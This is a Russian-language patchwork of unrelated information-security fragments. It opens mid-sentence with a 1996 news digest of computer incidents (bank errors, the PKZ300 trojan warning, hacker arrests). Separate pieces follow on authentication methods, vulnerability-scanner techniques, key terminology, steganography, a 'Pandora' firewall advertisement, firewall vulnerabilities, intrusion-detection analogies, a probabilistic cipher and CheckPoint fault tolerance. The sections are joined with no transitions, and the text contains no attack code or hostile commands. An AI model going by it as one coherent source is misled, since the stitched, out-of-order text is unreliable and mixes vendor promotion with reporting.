индустриального прошлого, абсолютно не годятся для измерения производительности
труда и затрат в постиндустриальной экономике, основанной на информации
и предоставлении услуг. (Как говорится, что посеешь, то и пожнешь,
или, выражаясь более современно, мусор введешь, мусор и получишь.)
Информационный сервис
Edupage сообщил, что компания DVD Software предлагает утилиту
"UnGame", отыскивающую и уничтожающую компьютерные игры
в соответствии с ежемесячно обновляемым списком. По данным на
июнь, более 20 колледжей и университетов приобрели и используют
эту утилиту, чтобы уменьшить время, растрачиваемое студентами,
занимающими дефицитные терминалы и рабочие станции под игры, тогда
как другие студенты нетерпеливо ожидают возможности поработать
за компьютером. ("Chronicle of Higher Education", 7
июня 1996 года, с. A24).
Новая версия программы
управления дорожным движением, установленная в Вашингтоне, без
всяких видимых причин перевела работу светофоров с режима часов
пик (50 секунд зеленого света), на режим выходных дней (15 секунд
зеленого света). Возникший хаос привел к удвоению времени поездок
многих людей.("Washington Post", 9 мая).
Во Франции два поставщика
Интернет-услуг, WorldNet и FranceNet, решили отключить доступ
ко всем телеконференциям Usenet, поскольку французская прокуратура
пригрозила арестом директоров, несущих персональную ответственность
за нарушение национальных законов Франции о детской порнографии.
Последовала буря протестов, а Французская ассоциация профессионалов
Интернет обратилась за международной поддержкой в борьбе с полицейской
акцией, предложив блокировать всю сеть Usenet (см. ).
Откликаясь на эти события,
Simson L. Garfinkel <> указал (см. ), что блокировать отдельные телеконференции Usenet, поставляющие
педофилам детскую порнографию, довольно легко. Более того, хранение
или передача детской порнографии является федеральным преступлением.
Всякая организация, поддерживающая соответствующие телеконференции
на территории Соединенных Штатов (в том числе America Online),
нарушает федеральное законодательство.
Согласно сообщению агентства
AP от 18 мая, First National Bank of Chicago допустил самую большую
счетную ошибку в финансовой истории. В результате компьютерной
ошибки (читай - плохого контроля качества) около 900 миллионов
долларов были переведены на каждый из примерно 800 счетов. Суммарная
ошибка, таким образом, составила 763.9 миллиарда долларов. Интересно,
какую премию по итогам года получили программисты?
Также 18 мая австралийское
агентство Associated Press сообщило о краже микросхем памяти и
жестких дисков из 55 компьютеров, установленных в здании правительства
провинции Квинсленд.
Еврейское издательское
общество выпустило компакт-диск с иудейской информацией. Покупатели
этого диска были неприятно поражены, увидев, что в программе предохранения
экрана использована христианская символика. Вероятно, диск готовила
компания, ориентированная преимущественно на христиан, и предохранение
экрана было в данном случае добавлено без учета контекста. К счастью
для межрелигиозных отношений, обе стороны признали свою ответственность
за случившиеся и поделили расходы на переиздание и повторное распространение
исправленной версии диска. Автор сообщения об этом случае в , Matthew P Wiener <>,
пошутил, что, по всей видимости, издатели не смогли организовать
должного бета-тестирования.
По сообщению "Wall
Street Journal" от 22 мая, две японские компании потеряли
около 588 миллионов иен после того, как мошенники научились не
только подделывать денежные карты, но и увеличивать закодированную
на них сумму. Электронные деньги переводились на обычные банковские
счета.
23 мая Rachel Polanskis
<> сообщила о том, что поисковый
сервер AltaVista включил в свой индекс файлы из корневого каталога
незащищенного Web-сервера. Когда она посредством навигатора отправилась
по найденной ссылке, то обнаружила, что получила суперпользовательский
доступ к системе, о которой ранее никогда не слышала. Рэчел весьма
любезно проинформировала о создавшейся ситуации администраторов
Web-сервера, которые тут же отключили его от сети и занялись восстановлением
защиты. Мораль состоит в том, что плохая система безопасности
на Web-сервере почти наверняка ведет к его полной компрометации
и получению доступа ко всей информации. ().
David Kennedy изложил
(в ) сообщение агентства Associated Press о сенатских
слушаниях, посвященных информационной безопасности. Правительственное
статистическое управление провело исследование числа незаконных
проникновений в компьютерные системы. Это исследование опиралось
на данные американского Министерства обороны, согласно которым
военные системы с несекретной информацией в 1995 году подвергались
атакам 160 тысяч раз. Агентство информационных систем Министерства
обороны собрало собственные данные, организовав около 38 тысяч
тестовых атак на несекретные системы. Примерно 65% атак оказались
успешными, причем лишь малая часть из них была обнаружена, а еще
меньшая - должным образом доведена до сведения командования. Обобщив
все эти данные, статистическое управление пришло к выводу, что
в 1995 году на правительственные компьютеры США было совершено
около 250 тысяч атак. На слушаниях говорилось также, что примерно
в 120 странах разрабатывают средства ведения информационной войны.
Peter Neumann указал, что отчет статистического управления можно
запросить в правительстве по наименованию "GAO/AIMD-96-84,
Information Security: Computer Attacks at Department of Defense
Pose Increasing Risks".
В конце мая с новой силой
разгорелась торговая война между Китаем и Соединенными Штатами.
США объявили о введении набора тарифов на общую сумму в 2 миллиарда
долларов в качестве компенсации за "массовое, терпимое и
даже поддерживаемое государством программное, музыкальное и видеопиратство,
поставленное в южном Китае на промышленную основу". (Reuters,
22 мая). Китайские чиновники заявили в ответ, что американское
давление на пиратов служит лишь прикрытием для "культурного
просачивания".
В Израиле полиция закрыла
три пиратские радиостанции, несанкционированно вещавшие на волнах,
зарезервированных для управления воздушным движением. (AP, 23
мая). Закрытию предшествовала забастовка авиадиспетчеров, парализовавшая
работу основного аэропорта Тель-Авива. Естественно, возникает
вопрос: "Если гражданские радиостанции могут непреднамеренно
нарушить функционирование важного аэропорта, то что в состоянии
сделать высокоэнергетические радиочастотные устройства (так называемые
HERF-пушки)?".
Продолжая борьбу за защиту
персональных данных, конгрессмен-республиканец Bob Franks и сенатор-демократ
Dianne Feinstein внесли на рассмотрение своих палат законопроект,
запрещающий предоставление информации о детях без согласия родителей
(AP, 23 мая). Подобная информация, которую собирают клубы дней
рождений в супермаркетах, магазинах игрушек, киосках быстрого
питания и т.п., поставляется компаниям, занимающимся рыночными
исследованиями и прямой рассылкой товаров по почте. Сторонники
законопроекта утверждают, что почтовые списки, доступные за плату
кому угодно, являются на самом деле списками потенциальных жертв.
28 мая Robert Alan Thomas,
40-летний житель калифорнийского города Милпитас, был приговорен
судом штата Юта к 26 месяцам заключения в федеральной тюрьме и
штрафу в размере 50 тысяч долларов за распространение детской
порнографии. Параллельно действует другой приговор, вынесенный
в Тенесси, согласно которому развратник и его жена должны отбыть
32 месяца в тюрьме штата за распространение непристойных изображений.
Данное дело имеет весьма серьезные последствия для операторов
электронных досок объявлений. Суд постановил, что любая передача
или прием подобного изображения может послужить основанием для
выдвижения обвинения.
Национальный исследовательский
совет опубликовал в конце месяца доклад, посвященный контролю
над криптосредствами. Коллектив известных ученых настоятельно
рекомендовал исключить криптосредства из законодательства о международной
торговле оружием. В докладе утверждается, что большинство целей,
ради которых ограничивается экспорт криптосредств, может быть
достигнуто путем разработки криптографического программного обеспечения,
предусматривающего возможность восстановления ключей или наличие
мастер-ключей для расшифровки сообщений по постановлению судебных
властей.
Один из сотрудников нашей
Ассоциации, занимающийся исследованием компьютерного подполья,
сообщил об аресте в собственном доме 16-летнего английского хакера
со звучным псевдонимом "Datastream Cowboy". Ему вменяются
в вину вторжения в компьютеры базы ВВС США в Rome Laboratories
(Нью-Йорк) и в некоторые другие международные сети. Еще одно сообщение
гласит, что вашингтонская группа криминальных хакеров "9x"
начала выпуск серии хакерских текстовых файлов.
Март
В начале марта система
электронной почты Белого Дома оказалась "затоплена"
из-за поддельной, непрошенной подписки на Интернетовские списки
рассылки, оформленной каким-то "доброжелателем" на правительственных
пользователей. "Автоответчик" в Белом Доме ()
реагировал на автоматически генерируемые входящие электронные
сообщения, направляя ответы в соответствующие списки, что вызвало
дополнительную перегрузку в Интернет. Эта атака на доступность
представляет собой еще одно проявление большой и постоянно растущей
проблемы киберпространства. В данном случае атаке способствовала
та простота, с которой можно подделать заголовки электронных писем,
в сочетании с неспособностью большей части программного обеспечения,
обслуживающего списки рассылки, выявлять поддельные запросы на
подписку.
В марте продолжалась атака
через телеконференции троянской программы с именем PKZ300B.ZIP
или PKZ300.EXE. Не принимайте, не передавайте и не выполняйте
файлы, выдающие себя за PKZip версии 3.0: это вредители, способные
уничтожить содержимое жестких дисков. Последняя версия программы
PKZip имеет номер 2.04g; соответствующее имя файла, скорее всего,
суть PKZ204g.zip.
В палату представителей
и сенат Конгресса США внесен законопроект, предусматривающий разрешение
экспорта аппаратуры и программ шифрования данных, если аналогичные
изделия доступны от зарубежных поставщиков. Законопроект утверждает
за каждым гражданином США право использовать внутри страны шифровальное
оборудование любого типа и запрещает обязательное использование
специальных ключей, позволяющих правоохранительным органам осуществлять
доступ к шифруемым данным. Кроме того, в законопроекте объявляется
преступлением применение криптосредств в преступных целях ("New
York Times", 4 марта 1996 года, с. C6).
Согласно сообщению "New
York Times" от 7 марта 1996 года, письмо, предназначавшееся
89 пользователям кредитных карт и извещавшее о приостановке их
счетов, в результате программной ошибки было отправлено в адрес
11 тысяч (из общего числа 13 тысяч) пользователей защищенных кредитных
карт банка Chase Manhattan. По иронии судьбы, это письмо получило
большинство самых благонадежных (и богатых) клиентов банка, что,
естественно, вызвало их раздражение. Как тут снова не вспомнить
о борьбе за повышение качества программного обеспечения?
Австралийская газета "The
Sunday Mail" (провниция Квинсленд) 10 марта сообщила об интересном
случае с двумя Белиндами - женщинами, носящими одно и то же имя,
Belinda Lee Perry, и родившимися в один день, 7 января 1969 года.
Из-за непродуманной реализации механизма уникальных идентификаторов
людей, совпадение имен и дат рождения гарантировало женщинам пожизненную
путаницу. Время от времени одна Белинда обнаруживала, что ее данные
затерты сведениями о тезке, что приводило к бесконечным неприятностям.
Единственный положительный момент во всей этой истории состоит
в установившихся дружеских отношениях двух страдалиц. Не пора
ли программистам понять, что пара (имя, дата рождения) не подходит
на роль уникального идентификатора?
Федеральная комиссия по
торговле (США) начала массированную атаку против мошенничества
в Интернет и WWW. Как сообщила 15 марта газета "Investor's
Business Daily", комиссия выдвинула против девяти физических
и юридических лиц обвинения в обманном использовании чужих имен.
В "Wall Street Journal"
от 15 марта сообщается о претензиях одного из производителей дисковых
приводов, компании IOMEGA. Утверждается, что ложная информация,
появившаяся в разделе "Motley Fool" (пестрые глупости)
сети America Online, вызвала сбои в торговле товарами этой компании.
IOMEGA направила жалобу в Комиссию по ценным бумагам и бирже (США).
Аналитики отмечают, что хоть в какой-то степени доверять такого
рода информации, публикуемой в сетях анонимно или под псевдонимом,
крайне глупо. (Конечно глупо, но, с другой стороны, кто слушает
советы аналитиков?)
Консультативный орган
по компьютерным инцидентам (Computer Incident Advisory Capability,
CIAC) Министерства энергетики США выпустил 18 марта бюллетень
"CIAC Notes" номер 96-01. В основной статье бюллетеня
приводится сводная информация об ошибках и исправлениях в области
безопасности Java и JavaScript. (Архив бюллетеней можно найти
по адресу ).
Член Национальной ассоциации
информационной безопасности США David Kennedy сообщил (см. ), что в конце марта компетентными органами Аргентины был
арестован Julio Cesar Ardita, 21 года, житель Буэнос-Айреса, системный
оператор электронной доски объявлений "Крик", больше
известный в компьютерном подполье под псевдонимом "El Griton".
Ему вменялись в вину систематические серьезные вторжения в компьютерные
системы ВМС США, NASA, многих крупнейших американских университетов,
а также в компьютерные системы Бразилии, Чили, Кореи, Мексики
и Тайваня. Одним из интересных аспектов данного дела является
использование гарвардской командой программ с искусственным интеллектом,
чтобы проанализировать тысячи возможных идентификаторов пользователей
и сузить круг подозреваемых до одного идентификатора, основываясь
на компьютерных привычках злоумышленника. Представители правительства
Аргентины конфисковали компьютер и модем хакера еще в январе.
Однако, несмотря на тесное сотрудничество компетентных органов
Аргентины и США, Ardita был отпущен без официального предъявления
обвинений, поскольку по аргентинскому законодательству вторжение
в компьютерные системы не считается преступлением. Кроме того,
в силу принципа "двойной криминальности", действующего
в международных правовых отношениях, Аргентина не может выдать
хакера американским властям. (Принцип "двойной криминальности"
утверждает, что необходимым условием выдачи гражданина другой
стране является уголовная наказуемость совершенного деяния в обеих
странах. Дело Ardita показывает, каким может быть будущее международных
компьютерных вторжений при отсутствии всеобщих или хотя бы двусторонних
соглашений о борьбе с компьютерной преступностью.)
Также в марте, "U4ea",
самопровозглашенный криминальный хакер, поднял волну Интернет-террора
в Бостоне. После атаки на компьютерную систему компании BerkshireNet
(см. выше информацию за февраль) и последовавших публикаций в
прессе, он, вероятно обидевшись, атаковал компьютеры газеты "Boston
Globe" и уничтожил хранившуюся на Web-сервере информацию.
Та же участь постигла Web-страницы газеты, хранившиеся на сервере
.
Механизмы аутентификации
Эти механизмы позволяют проверить подлинность личности участника взаимодействия безопасным и надежным способом.
| Тип | Описание | |
| Пароли или PIN-коды (персональные идентификационные номера) | Что-то, что знает пользователь и что также знает другой участник взаимодействия.
Обычно аутентификация производится в 2 этапа. Может организовываться обмен паролями для взаимной аутентификации. | |
| Одноразовый пароль | Пароль, который никогда больше не используется.
Часто используется постоянно меняющееся значение, которое базируется на постоянном пароле. | |
| CHAP (протокол аутентификации запрос-ответ) | Одна из сторон инициирует аутентификацию с помощью посылки уникального и непредсказуемого значения "запрос" другой стороне, а другая сторона посылает вычисленный с помощью "запроса" и секрета ответ. Так как обе стороны владеют секретом, то первая сторона может проверить правильность ответа второй стороны. | |
| Встречная проверка (Callback) | Телефонный звонок серверу и указание имени пользователя приводит к тому, что сервер затем сам звонит по номеру, который указан для этого имени пользователя в его конфигурационных данных. |
Механизмы работы
Существует два основных механизма, при помощи которых сканер проверяет наличие уязвимости - сканирование (scan) и зондирование (probe).
Сканирование - механизм пассивного анализа, с помощью которого сканер пытается определить наличие уязвимости без фактического подтверждения ее наличия - по косвенным признакам. Этот метод является наиболее быстрым и простым для реализации. В терминах компании ISS данный метод получил название "логический вывод" (inference). Согласно компании Cisco этот процесс идентифицирует открытые порты, найденные на каждом сетевом устройстве, и собирает связанные с портами заголовки (banner), найденные при сканировании каждого порта. Каждый полученный заголовок сравнивается с таблицей правил определения сетевых устройств, операционных систем и потенциальных уязвимостей. На основе проведенного сравнения делается вывод о наличии или отсутствии уязвимости.
Зондирование - механизм активного анализа, который позволяет убедиться, присутствует или нет на анализируемом узле уязвимость.Зондирование выполняется путем имитации атаки, использующей проверяемую уязвимость. Этот метод более медленный, чем "сканирование", но почти всегда гораздо более точный, чем он. В терминах компании ISS данный метод получил название "подтверждение" (verification). Согласно компании Cisco этот процесс использует информацию, полученную в процессе сканирования ("логического вывода"), для детального анализа каждого сетевого устройства. Этот процесс также использует известные методы реализации атак для того, чтобы полностью подтвердить предполагаемые уязвимости и обнаружить другие уязвимости, которые не могут быть обнаружены пассивными методами, например подверженность атакам типа "отказ в обслуживании" ("denial of service").
На практике указанные механизмы реализуются следующими несколькими методами.
Методология с использованием ключа
В этой методологии алгоритм шифрования объединяет ключ с текстом для создания шифртекста. Безопасность систем шифрования такого типа зависит от конфиденциальности ключа, используемого в алгоритме шифрования, а не от хранения в тайне самого алгоритма. Многие алгоритмы шифрования общедоступны и были хорошо проверены благодаря этому (например, DES).
Но основная проблема, связанная с этой методологией, состоит в том, как сгенерировать и безопасно передать ключи участникам взаимодействия. Как установить безопасный канал передачи информации между участниками взаимодействия до передачи ключей?
Другой проблемой является аутентификация. При этом существуют две серьезных проблемы:
Сообщение шифруется кем-то, кто владеет ключом в данный момент. Это может быть владелец ключа; но если система скомпрометирована, это может быть другой человек. Когда участники взаимодействия получают ключи, откуда они могут узнать, что эти ключи на самом деле были созданы и посланы уполномоченным на это лицом?
Существуют две методологии с использованием ключей - симметричная (с секретным ключом) и асимметричная (с открытым ключом). Каждая методология использует свои собственные процедуры, свои способы распределения ключей, типы ключей и алгоритмы шифрования и расшифровки ключей. Так как терминология, используемая этими методологиями, может показаться непонятной, дадим определения основным терминам:
| Термин | Значение | Замечания | |
| Симметричная методология | Используется один ключ, с помощью которого производится как шифрование, так и расшифровка с использованием одного и того же алгоритма симметричного шифрования.
Этот ключ передается двум участникам взаимодействия безопасным образом до передачи зашифрованных данных. | Часто называется методологией с секретным ключом. | |
| Асимметричная методология | Использует алгоритмы симметричного шифрования и симметричные ключи для шифрования данных
Использует алгоритмы асимметричного шифрования и асимметричные ключи для шифрования симметричного ключа. Создаются два взаимосвязанных асимметричных ключа. Симметричный ключ, зашифрованный с использованием одного асимметричного ключа и алгоритма асимметричного шифрования, должен расшифровываться с использованием другого ключа и того же алгоритма шифрования. Создаются два взаимосвязанных асимметричных ключа. Один должен быть безопасно передан его владельцу, а другой - тому лицу, которое отвечает за хранение этих ключей (CA - сертификационному центру ключей), до начала их использования. | Часто называется методологией с открытым ключом | |
| Секретный ключ(1) | Симметричная методология | Используется один ключ, с помощью которого производится как шифрование, так и расшифровка. См. выше | |
| Секретный ключ(2) | Секретный ключ симметричного шифрования | Симметричный секретный ключ | |
| Секретный ключ(3) | Секретный ключ асимметричного шифрования | Асимметричный секретный ключ
Асимметричные ключи создаются парами, так как связаны друг с другом. Выражение "секретный ключ" часто используют для одного из пары асимметричных ключей, который должен держаться в секрете. Асимметричный секретный ключ не имеет ничего общего с симметричным секретным ключом. | |
| Открытый ключ (1) | Асимметричная методология | Использует пару ключей, которые совместно создаются и связаны друг с другом. Все, что зашифровано одним ключом, может быть расшифровано только другим ключом этой пары. | |
| Открытый ключ (2) | Открытый ключ асимметричного шифрования | Асимметричные ключи создаются парами, каждый из двух ключей связан с другим.
Выражение "открытый ключ" часто используют для одного из пары асимметричных ключей, который должен быть всем известен. | |
| Сеансовый ключ | Симметричный (секретный) ключ шифрования | Используется в асимметричной методологии для шифрования самих данных с помощью симметричных методологий.
Это просто симметричный секретный ключ (см. выше) | |
| Алгоритм шифрования | Математическая формула | Для симметричных алгоритмов требуются симметричные ключи.
Для асимметричных алгоритмов требуются асимметричные ключи. Вы не можете использовать симметричные ключи для асимметричных алгоритмов и наоборот. | |
| Секретные криптосистемы | Используют симметричные алгоритмы и симметричные (секретные) ключи для шифрования данных. |   | |
| Открытые криптосистемы | Использует асимметричные алгоритмы и асимметричные ключи для шифрования сеансовых ключей.
Используют симметричные алгоритмы и симметричные (секретные) ключи для шифрования данных. |   |
Методы
В настоящее время существует достаточно много различных методов (и их вариантов) встраивания сообщений (имеется в виду и встраивание цифровых водяных знаков). Из-за ограниченности объема публикации невозможно описать все используемые методы, однако некоторые из них достаточно хорошо описаны в специальной литературе [8, 9, 10, 11].
Методы сокрытия информации
В настоящее время наиболее распространенным, но наименее стойким является метод замены наименьших значащих битов или LSB-метод. Он заключается в использовании погрешности дискретизации, которая всегда существует в оцифрованных изображениях или аудио- и видеофайлах. Данная погрешность равна наименьшему значащему разряду числа, определяющему величину цветовой составляющей элемента изображения (пикселя). Поэтому модификация младших битов в большинстве случаев не вызывает значительной трансформации изображения и не обнаруживается визуально. Более подробно LSB-метод описан в статье В. Н. Кустова и А. А. Федчука "Методы встраивания скрытых сообщений" ("Защита информации. Конфидент", №3, 2000, стр. 34).
Другим популярным методом встраивания сообщений является использование особенностей форматов данных, использующих сжатие с потерей данных (например JPEG). Этот метод (в отличии от LSB) более стоек к геометрическим преобразованиям и обнаружению канала передачи, так как имеется возможность в широком диапазоне варьировать качество сжатого изображения, что делает невозможным определение происхождения искажения. Более подробно этот метод описан в статье С. Ф. Быкова "Алгоритм сжатия JPEG с позиции компьютерной стеганографии" ("Защита информации. Конфидент", №3, 2000, стр. 26).
Для встраивания цифровых водяных знаков используются более сложные методы.
Межсетевой экран для защиты локальной сети
Информация предоставлена
При подключении локальной сети к сети общего пользования перед Вами сразу возникает проблема: как обеспечить безопасность информации в Вашей локальной сети?
Межсетевой экран "ПАНДОРА" на базе фирмы и компьютера О2 фирмы Silicon Graphics под управлением IRIX 6.3 не только надежно решит проблему безопасности Вашей сети, но и позволит Вам:
скрыть от пользователей глобальной сети структуру Вашей сети (IP-адреса, доменные имена и т.д.)
определить, каким пользователям, с каких хостов, в направлении каких хостов, в какое время, какими сервисами можно пользоваться
описать для каждого пользователя, каким образом он должен аутентифицироваться при доступе к сервису
получить полную статистику по использованию сервисов, попыткам несанкционированного доступа, трафику через "Пандору" и т.д.
"Пандора" устанавливается на компьютер с двумя Ethernet интерфейсами на выходе между локальной сетью и сетью общего пользования.
"Пандора" построена на серверах протоколов прикладного уровня (proxy) и поддерживает следующие сервисы:
TELNET, Rlogin (терминалы)
FTP (передача данных)
SMTP,POP3 ( почта)
HTTP ( WWW )
Gopher
X11 (X Window System)
LP ( сетевая печать )
Rsh (удаленное выполнение задач)
Finger
NNTP (новости Usenet)
Whois
RealAudio
Кроме того, в состав "Пандоры" входит сервер общего назначения TCP уровня, который позволяет безопасно транслировать через "Пандору" запросы от базирующихся на TCP протоколов, для которых нет proxy серверов, а также сервер сетевого доступа, который позволяет запускать различные программы в зависимости от того, откуда пришел запрос.
Для аутентификации пользователей "Пандора" позволяет использовать следующие схемы аутентификации:
обычный UNIX пароль;
S/Key, MDauth ( одноразовые пароли).
POP3-proxy позволяет использовать APOP авторизацию и тем самым избежать передачи по сети открытого пароля.
FTP-proxy позволяет ограничить использование пользователями отдельных команд ( например RETR, STOR и т.д.)
HTTP-proxy позволяет контролировать передачу через "Пандору"
фреймов
описаний на языке Java
описаний на языке JavaScript
html конструкций, не попадающих под стандарт HTML версии 2 и т.д.
Гибкая и удобная система сбора статистики и генерации отчетов позволяет собрать и обработать информацию обо всех соединениях, включая время, количество байт, адрес источника, адрес назначения, ID пользователя ( если есть), а также аномалии в самой системе.
"Пандора" не требует ни внесения изменений в клиентское программное обеспечение, ни использования специального программного обеспечения
Прозрачный режим работы proxy серверов позволяет внутренним пользователям соединяться с нужным хостом за один шаг ( т.е. без промежуточного соединения с "Пандорой".
Система контроля целостности позволяет контролировать безопасность модулей самой системы.
Графический интерфейс управления служит для настройки, администрирования и просмотра статистики "Пандоры".
"Пандора" поставляется вместе с исходными текстами основных программ, с тем чтобы можно было убедиться в отсутствии закладок и разобраться, как он работает.
"Пандора" сертифицирована Государственной Технической Комиссией при президенте России СЕРТИФИКАТ N 73. Выдан 16 января 1997г. Действителен до 16 января 2000г.
Межсетевой экран - как цель атаки
Межсетевые экраны часто сами являются объектами атаки. Атаковав МСЭ и выведя его из строя, злоумышленники могут спокойно, не боясь быть обнаруженными, реализовывать свои преступные замысли по отношению к ресурсам защищаемой сети. Например, с начала 2001 года было обнаружено немало уязвимостей в реализации различных известных межсетевых экранов. Например, неправильная обработка TCP-пакетов с флагом ECE в МСЭ ipfw или ip6fw позволяла удаленному злоумышленнику обойти созданные правила. Еще одна уязвимость была обнаружена в межсетевом экране BorderWare Firewall Server 6.1.2. Использование данной уязвимости, связанной с широковещательной посылкой запросов ICMP Echo Request, приводила к нарушению доступности МСЭ BorderWare. В стороне не остались и другие межсетевые экраны - Cisco Secure Pix Firewall, WatchGuard Firebox и т.д.
Мир физический и мир виртуальный
После небольшого отступления перейду к теме статьи - обнаружению и отражению угроз. Эта область известна многим специалистам в области безопасности. Она представлена такими средствами физической безопасности, как средства сигнализации и оповещения. В свою очередь эти средства делятся на два категории: постоянного и периодического действия. Первые системы, к которым можно отнести пожарную и охранную сигнализацию, охранное телевидение и т.п., непрерывно следят за объектом защиты. Системы периодического действия работают по другому принципу - они анализируют состояние объекта защиты в заданные моменты или через определенные промежутки времени. Типичным примером таких средств является периодический обход территории охранниками. К средствам отражения можно отнести ограждение территории, замки и решетки и т.п.
Однако информационная система - это тоже своего рода здание, только виртуальное, которое необходимо защищать. И использовать для этого можно те же механизмы физической безопасности, но спроецированные с учетом особенностей информационных технологий. Например, несанкционированный вход в обычное здание блокируется охранником или турникетом. В виртуальном здании для этого используется межсетевой экран или система аутентификации, которые проверяют входящий (и исходящий) в систему трафик на соответствие различным критериям.
Однако злоумышленник для несанкционированного проникновения в здание может подделать пропуск (в виртуальном мире подделать адрес) или пролезть через окно (в виртуальном мире через модем). И никакой охранник или турникет не защитит от этого. И тут на первый план выходят средства обнаружения угроз в виде различных датчиков, идентифицирующих различные угрозы.
По своему функциональному назначению датчики охранной сигнализации делятся на три типа [4]:
Контролирующие пространство помещений (объемные датчики); Контролирующие периметр объекта защиты (линейные датчики); Контролирующие отдельные предметы (точечные датчики).
Как это не странно, но и в виртуальном здании применяются те же самые датчики. Называются они сенсорами системы обнаружения атак. Единственное отличие от датчиков охранной сигнализации в наличии двух категорий вместо трех:
Контроль сетевого сегмента (аналог объемного датчика). В случае применения данного сенсора совместно с межсетевым экраном или иным средством защиты периметра сети сенсор системы обнаружения атак, функционирующий на уровне сети выполняет роль линейного датчика. Контроль отдельного узла информационной системы (аналог точечного датчика).
Аналог механизма охранной сигнализации и оповещения периодического действия тоже присутствует в виртуальном мире. Это системы анализа защищенности, которые по требованию администратора безопасности или по расписанию проводят ряд проверок заданных компонентов информационной системы. Можно провести следующую аналогию с анализом защищенности - охранник, периодически обходящий все этажи здания в поисках открытых дверей, незакрытых окон и других проблем. Также действует и система анализа защищенности. Только в качестве здания выступает информационная система, а в качестве незакрытых окон и дверей - уязвимости ("слабости") этой системы.
Модернизация шифра с простым вероятностным механизмом.
Copyright © Titov Oleg, 2001, .
Одним из перспективных способов повышения стойкости известных шифров является задание неопределенности хода шифрования информации. Эта идея может быть реализована путем введения случайных данных в преобразуемое сообщение. "Подмешивание" случайных данных к шифруемому сообщению позволяет задать вероятностный характер операций преобразования и тем самым повысить вычислительную стойкость криптосистемы.
Пусть E есть b-битовая функция шифрования, P есть p-битовый блок открытого текста и R - r-битовый случайный блок, где b=r+p. Подадим на вход шифрующей функции блок B = R | P , где знак "|" обозначает конкатенацию двоичных векторов R и P:
P -> B = R | P -> C = E( B, K ),
где K - ключ шифрования. Для шифрования больших объемов данных исходный текст разбивается на блоки длиной p-бит и с каждым из них проводятся вышеуказанные операции. Для каждого такого блока в простых вероятностных шифрах генерируется новый случайный вектор R. В модернизированном простом вероятностном шифре для второго и далее блоков не генерируется случайный вектор R, а случайные биты берутся из предыдущего зашифрованного блока по следующей схеме.
Пусть P=P1|P2|P3|...|Pn - преобразуемое исходное сообщение, R - случайный r-битовый вектор, тогда
B1 = R | P1 , C1' | C1 = E( B1, K ), Bi = Ci-1 | Pi , Ci' | Ci = E( Bi, K ), C=C1' | C2' | ... | Cn' | Cn
где i изменяется от 2 до n, Ci' - p-битовый вектор, Ci - r-битовый вектор.
В результате мы избавляемся от главного недостатка простых вероятностных шифров - увеличение размера зашифрованного текста в сравнении с незашифрованым в b/p раз. Переход от случайных бит к псевдослучайным, при наличии "хорошей" функции E, не является существенным недостатком, т.к. в существующих криптографических системах используются именно псевдослучайные биты.
Надежность и отказоустойчивость средств защиты
Очевидно, что к надежности и отказоустойчивости средств защиты предприятия, предъявляются очень высокие требования, так как при отказе, например, межсетевого экрана или VPN-шлюза, предприятие полностью или частично (в зависимости от количества каналов связи) лишается возможности взаимодействовать с внешним миром, а это при современной схеме ведения бизнеса крайне убыточно.
Надежность и отказоустойчивость отдельного продукта безопасности определяется соответствующими характеристиками его платформы и качеством реализации самого продукта. Для обеспечения нужного уровня надежности средств защиты необходимо тщательно выбирать для них платформу (компьютер и операционную систему) или же пользоваться аппаратными устройствами безопасности, надежность которых гарантируется производителем.
В особо ответственных применениях надежность и отказоустойчивость системы защиты необходимо повышать за счет резервирования и избыточности самих средств защиты - межсетевых экранов, VPN-устройств, средств обнаружения вторжений и т.д. Для поддержки такой архитектуры устройства защиты должны поддерживать возможность работы по схемам горячего резервирования или кластерной организации с полной синхронизацией состояний. Переход на резервный межсетевой экран или избыточный шлюз должен происходить автоматически при обнаружении отказа основного устройства. Важным свойством отказоустойчивых средств безопасности является прозрачность перехода на резервное устройство для внешних пользователей, сессии которых не должны разрываться из-за реконфигурации устройств защиты.
Надежность системы безопасности, построенной на продуктах компании CheckPoint, обеспечивается комплексно. Во-первых, она определяется высокой надежностью программного обеспечения продуктов компании CheckPoint, проверенного большим количеством инсталляций по всему миру. Во-вторых, общая надежность системы безопасности зависит от надежности аппаратно-программной платформы (ОС + компьютер). Платформу для экранов и шлюзов корпоративной сети предприятие может выбрать либо самостоятельно (и нести в этом случае ответственность за ее надежность), либо положиться на выбрать платформу с гарантированно высокой надежностью, применив специализированные устройства VPN-1 Appliance.
Межсетевые экраны FireWall-1 и шлюзы VPN-1 поддерживают отказоустойчивые конфигурации, основанные на кластерах избыточных устройств и обеспечивающие прозрачный для трафика пользователей переход на резервное или избыточное устройство при отказе основного. Такие конфигурации необходимы для наиболее ответственных приложений, так как какой бы высокой ни была надежность отдельных продуктов, отказы их все же возможны, и в этих условиях единственно возможным решением является применение избыточных устройств.
Разработка отказоустойчивых систем является для компании CheckPoint одним из приоритетных стратегических направлений. Свойствами отказоустойчивости на сегодня обладают не только продукты FireWall-1/VPN-1, но и системы контроля доступа на основе содержания.
Отказоустойчивые конфигурации FireWall-1/VPN-1 используют такое свойство этих продуктов как возможность синхронизации данных о состоянии соединений, содержащихся во внутренних таблицах модулей. Синхронизируются данные состояния контролируемых по доступу сессий, а также сессий протоколов IPSec и FWZ шлюзов VPN-1. На основе этих данных можно построить различные схемы, обеспечивающие отказоустойчивость.
Сегодня существует возможность построения отказоустойчивой конфигурации исключительно на продуктах CheckPoint, а также с привлечением продуктов третьих фирм. Вариант CheckPoint основан на применении модуля High Availability в экранах-шлюзах FireWall-1/VPN-1, который контролирует работоспособность устройств и обеспечивает прозрачных переход на работоспособное устройство в случае отказа без разрыва соединений, проходящих через экран и защищенных соединений VPN-шлюза. Кроме поддержки отказоустойчивости модуль High Availability является программируемым монитором работоспособности FireWall-1/VPN-1, что упрощает его обслуживание. Возможно также создание кластерных конфигураций, включающих большое количество синхронизируемых систем FireWall-1/VPN-1.
Существует также ряд продуктов от партнеров по программе OPSEC, обеспечивающих прозрачный переход на резервную систему FireWall-1/VPN-1 при отказе основной, например, StoneBeat от Stonesoft или Legato FullTime HA+ for FireWall-1 от Legato Systems.
Отказоустойчивость VPN-соединений можно также обеспечить на клиентской стороне с помощью продукта VPN-1 SecuRemote. Этот вариант может применяться тогда, когда в центральной сети имеется несколько VPN-шлюзов, но он не требует их синхронизации и резервирования. Клиент VPN-1 SecuRemote может самостоятельно обнаружить отказ шлюза и перейти на другой доступный VPN-шлюз. Такой способ полезен при наличии у предприятия нескольких шлюзов, обеспчеивающих доступ в копроративную сеть, но расположенных в разных географических пунктах, так что их синхронизация может оказаться проблематичной.
